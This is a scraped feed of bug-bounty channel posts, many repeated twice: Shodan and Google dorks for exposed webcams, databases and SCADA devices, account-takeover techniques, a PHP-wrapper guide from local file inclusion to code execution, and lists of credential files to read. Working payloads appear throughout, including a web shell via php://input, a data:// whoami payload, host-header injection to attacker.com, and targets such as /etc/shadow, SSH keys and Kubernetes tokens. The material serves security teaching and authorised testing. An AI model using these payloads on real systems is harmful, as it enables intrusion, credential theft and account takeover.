↳Shodan Dorks for OSINT, Recon and Bug Bounty
📸 Exposed Webcams
• Example: http.title:"webcamXP"
🧑💻 Open FTP Servers
• Example (Anonymous login access): port:21 anonymous
💻 Outdated Operation Systems
• Example: os:"Windows 7"
🌐 Misconfigured MongoDB Databases
• Example: product:"MongoDB" port:27017
🔐 Exposed Login Panels
• Example: http.title:"Admin Login"
🧭 Specific Geolocation Targets
• Example: port:22 country:"IN"
🧨 Apache Servers with Expired SSL in the US
• Example: product:"Apache httpd" ssl:"expired" country:"US"
🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
• Example: http.html:"Atlassian Confluence" port:8090
🎛 ICS/SCADA Devices
• Example: port:502 name:"modbus"
Subdomain Enumeration with Favicon using Shodan:
Shodan Search Query Fundamentals:
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
📸 Exposed Webcams
Finds IP cams running webcamXP software
• Example: http.title:"webcamXP"
🧑💻 Open FTP Servers
Finds FTP servers that allow anonymous login
• Example (Anonymous login access): port:21 anonymous
💻 Outdated Operation Systems
Like Finding devices that running Windows 7
• Example: os:"Windows 7"
🌐 Misconfigured MongoDB Databases
Finds exposed MongoDB instances without authentication
• Example: product:"MongoDB" port:27017
🔐 Exposed Login Panels
Identifies admin login portals
• Example: http.title:"Admin Login"
🧭 Specific Geolocation Targets
Finds services exposed in a specific country
• Example: port:22 country:"IN"
🧨 Apache Servers with Expired SSL in the US
Finds Apache web servers with expired SSL certs in the US
• Example: product:"Apache httpd" ssl:"expired" country:"US"
🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
Finds potentially vulnerable Confluence servers
• Example: http.html:"Atlassian Confluence" port:8090
🎛 ICS/SCADA Devices
Detects Modbus protocol on industrial systems
• Example: port:502 name:"modbus"
Subdomain Enumeration with Favicon using Shodan:
Shodan Search Query Fundamentals:
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
❤1🔥1
Firing 8 Account Takeover Methods
🔴Unicode Normalization Issue
1. victim account: victim@gmail.com
2. create an account using Unicode | example: vićtim@gmail.com (here is ć is an Unicode character)
✍️ list of Unicode character: 🔗 Link
🔴Authorization Issue
1. change email of Account A and put email B
2. check confirmation mail in account B
3. open the confirmation mail from account C
Taken over Account C
🔴Reusing Reset Token
if target allows you to reuse the reset link then hunt for more reset link via gau ,wayback or urlscan.io
🔴Pre Account Takeover
1. signup using normal signup form as a hacker but hacker has no verification link.
2. then if victim signs up using oauth .
3. Verification bypass now attacker can login the victim account without verification link with the password he entered while registering.
🔴CORS Misconfiguration to Account Takeover
1. check api , any endpoint has access access token/session/secret/fingerprint
2. if yes check for CORS misconfiguration does it allow us to fetch data from target?
3. make a payload to fetch data and replace headers and boom
🔴CSRF to ATO
If profile modification in cookie based authentication doesn’t generate any token
1. open Account A change & Put email that you own click save intercept the request and generate a csrf poc.
2. if fully cookie based auth then you dont have to modify anything send the CSRF file to victim.
3. if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target
hint: password reset page helps many times for UUID/GUID and UserID
🔴Host Header Injection
well in this case there are 4 ways do that.
1. click reset password change host header.
2. or change proxy header ex: X-Forwarded-For: attacker.com
3. or change host, referrer, origin headers at once as attacker.com
4. click reset then click resend mail and do all 3 methods above
🔴Response Manipulation
1. code manipulation * to 200 OK
2. code and body manipulation
code * to 200 OK
body * to {"success":true} or {}
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO
🔴Unicode Normalization Issue
1. victim account: victim@gmail.com
2. create an account using Unicode | example: vićtim@gmail.com (here is ć is an Unicode character)
✍️ list of Unicode character: 🔗 Link
Note: check where verification doesn’t require
🔴Authorization Issue
1. change email of Account A and put email B
2. check confirmation mail in account B
3. open the confirmation mail from account C
Taken over Account C
🔴Reusing Reset Token
if target allows you to reuse the reset link then hunt for more reset link via gau ,wayback or urlscan.io
🔴Pre Account Takeover
1. signup using normal signup form as a hacker but hacker has no verification link.
2. then if victim signs up using oauth .
3. Verification bypass now attacker can login the victim account without verification link with the password he entered while registering.
🔴CORS Misconfiguration to Account Takeover
1. check api , any endpoint has access access token/session/secret/fingerprint
2. if yes check for CORS misconfiguration does it allow us to fetch data from target?
3. make a payload to fetch data and replace headers and boom
🔴CSRF to ATO
If profile modification in cookie based authentication doesn’t generate any token
1. open Account A change & Put email that you own click save intercept the request and generate a csrf poc.
2. if fully cookie based auth then you dont have to modify anything send the CSRF file to victim.
3. if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target
hint: password reset page helps many times for UUID/GUID and UserID
🔴Host Header Injection
well in this case there are 4 ways do that.
1. click reset password change host header.
2. or change proxy header ex: X-Forwarded-For: attacker.com
3. or change host, referrer, origin headers at once as attacker.com
4. click reset then click resend mail and do all 3 methods above
🔴Response Manipulation
1. code manipulation * to 200 OK
2. code and body manipulation
code * to 200 OK
body * to {"success":true} or {}
It works when json is being used to transfer and receive data.
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO
Wikipedia
List of Unicode characters
Wikimedia list article
🔥2
🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE
⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇
🎯 Why PHP Wrappers Matter in Bug Bounty
As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior
Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://
🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.
Payload:
Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source
Example:
Decode result:
Now you see source code, credentials, internal logic, API keys, etc.
🔧 Other Useful PHP Wrappers
1️⃣ php://input
Reads raw POST data.
Good for injecting code during file inclusions via POST.
Then POST:
✅ Shell access via cmd parameter.
2️⃣ expect:// (if available)
Allows direct execution of system commands.
⚠️ Rare but deadly if enabled.
3️⃣ data://
Inline file input using base64 or plaintext.
Example:
🟡 Executes: system('whoami')
4️⃣ zip://
✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.
Structure:
Use this with file upload + LFI combo.
5️⃣ phar://
Deserializes metadata → use with Object Injection + LFI.
Upload malicious PHAR:
If unserialize() is called on a phar wrapper, it can lead to RCE.
🔍 Fuzzing PHP Files Before Exploiting
Watch for:
200 → exists and renders
403/302 → access denied, but still includable via LFI
📁 Standard Inclusion vs. Filtered Inclusion
Including via:
🟡 Executes file, no output if file has no HTML.
Using filter:
🟡 Returns base64 source code.
🧪 Decode & Analyze the Source Code
Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys
💣 Advanced Chaining → From LFI to RCE
Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE
This chain has been used in real-world bounty reports.
🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns
🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs
👍 Like this post if it helped
🔁 Share to boost your hacker circle
🔗 Github link : github.com/cybersecplayground...
#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground
⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇
🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.
As attackers, we can abuse these wrappers to:
✅ Read raw PHP source (even when .php is auto-appended)
✅ Bypass execution to leak secrets
✅ Chain into full RCE
✅ Abuse legacy or misconfigured server behavior
Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://
🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.
Payload:
php://filter/read=convert.base64-encode/resource=index
Why it works:
✅ read=convert.base64-encode prevents execution of the PHP code
✅ Base64 output = raw, readable source
Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config
Decode result:
echo 'PD9waHAK...base64...' | base64 -d
Now you see source code, credentials, internal logic, API keys, etc.
🔧 Other Useful PHP Wrappers
1️⃣ php://input
Reads raw POST data.
Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>
Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>
✅ Shell access via cmd parameter.
2️⃣ expect:// (if available)
Allows direct execution of system commands.
include('expect://ls');
⚠️ Rare but deadly if enabled.
3️⃣ data://
Inline file input using base64 or plaintext.
Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');
🟡 Executes: system('whoami')
4️⃣ zip://
✅ Targets ZIP files as file systems.
✅ Abuse via LFI to include malicious entries.
Structure:
zip://path/to/archive.zip#file_inside.txt
Use this with file upload + LFI combo.
5️⃣ phar://
Deserializes metadata → use with Object Injection + LFI.
Upload malicious PHAR:
phar://path/to/phar_file
If unserialize() is called on a phar wrapper, it can lead to RCE.
🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php
Watch for:
200 → exists and renders
403/302 → access denied, but still includable via LFI
📁 Standard Inclusion vs. Filtered Inclusion
Including via:
?file=config
🟡 Executes file, no output if file has no HTML.
Using filter:
?file=php://filter/read=convert.base64-encode/resource=config
🟡 Returns base64 source code.
🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d
Look for:
✅ $db_password, $admin_pass
✅ API endpoints
✅ Sensitive routes
✅ Hardcoded JWT secrets or keys
💣 Advanced Chaining → From LFI to RCE
Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE
This chain has been used in real-world bounty reports.
🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns
🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs
👍 Like this post if it helped
🔁 Share to boost your hacker circle
🔗 Github link : github.com/cybersecplayground...
#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground
GitHub
bugbounty-Tips-and-Tricks/TIPS/Mastering-PHP-Filters.md at main · cybersecplayground/bugbounty-Tips-and-Tricks
A curated collection of bug bounty tips, tricks, payloads, and bypass techniques - cybersecplayground/bugbounty-Tips-and-Tricks
❤5🔥1
🚀 LFI - Interesting Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
Kubernetes
Configure Service Accounts for Pods
Kubernetes offers two distinct ways for clients that run within your cluster, or that otherwise have a relationship to your cluster's control plane to authenticate to the API server.
A service account provides an identity for processes that run in a Pod,…
A service account provides an identity for processes that run in a Pod,…
❤1
Grep tips for Javascript Analysis
🟣Extracting JavaScript Files from recursive Directories
🟣Searching for API Keys and Secrets
🟣Detecting Dangerous Function Calls
🟣Checking for URL Manipulation
🟣Searching for Cross-Origin Requests
🟣Analyzing postMessage Usage
🟣Finding Hardcoded URLs or Endpoints
🟣Locating Debugging Information
🟣Investigating User Input Handling
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS
💡Note: cat * is for all files from the folder.
🟣Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
🟣Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
🟣Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
🟣Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
🟣Searching for Cross-Origin Requests
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
🟣Analyzing postMessage Usage
cat * | grep -r "postMessage"
🟣Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."
🟣Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
🟣Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS
❤3
A Comprehensive Repo for Shodan Dorks
This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers.
• Repository: https://github.com/nullfuzz-pentest/shodan-dorks
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers.
• Repository: https://github.com/nullfuzz-pentest/shodan-dorks
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
GitHub
GitHub - nullfuzz-pentest/shodan-dorks: Shodan Dorks
Shodan Dorks. Contribute to nullfuzz-pentest/shodan-dorks development by creating an account on GitHub.
❤1
🚀 Google Dorks for Bug Bounty & Web Security! 🔍
A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯
🔥 Broad Domain Search (Exclude Common Subdomains)
🔥 PHP Files with Parameters
🔥 API Endpoints Discovery
🔥 Juicy Extensions (Sensitive Files)
🔥 High-Value InURL Keywords
🔥 Finding Server Errors
💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws!
📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity
A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯
🔥 Broad Domain Search (Exclude Common Subdomains)
site:example.com -www -shop -share -ir -mfa
🔥 PHP Files with Parameters
site:example.com ext:php inurl:?
🔥 API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
🔥 Juicy Extensions (Sensitive Files)
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
🔥 High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
🔥 Finding Server Errors
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws!
📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity
👍3❤1
If you come across a WordPress website, fuzz for these files and patterns:
• You can generate wordlists with the patterns above or any pattern you want using Fback:
https://github.com/Spix0r/Fback
#InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing
.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip
• You can generate wordlists with the patterns above or any pattern you want using Fback:
https://github.com/Spix0r/Fback
#InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing
GitHub
GitHub - Spix0r/fback: Fback is a tool that helps you create target-specific wordlists using a .json pattern.
Fback is a tool that helps you create target-specific wordlists using a .json pattern. - Spix0r/fback
❤2👍1🔥1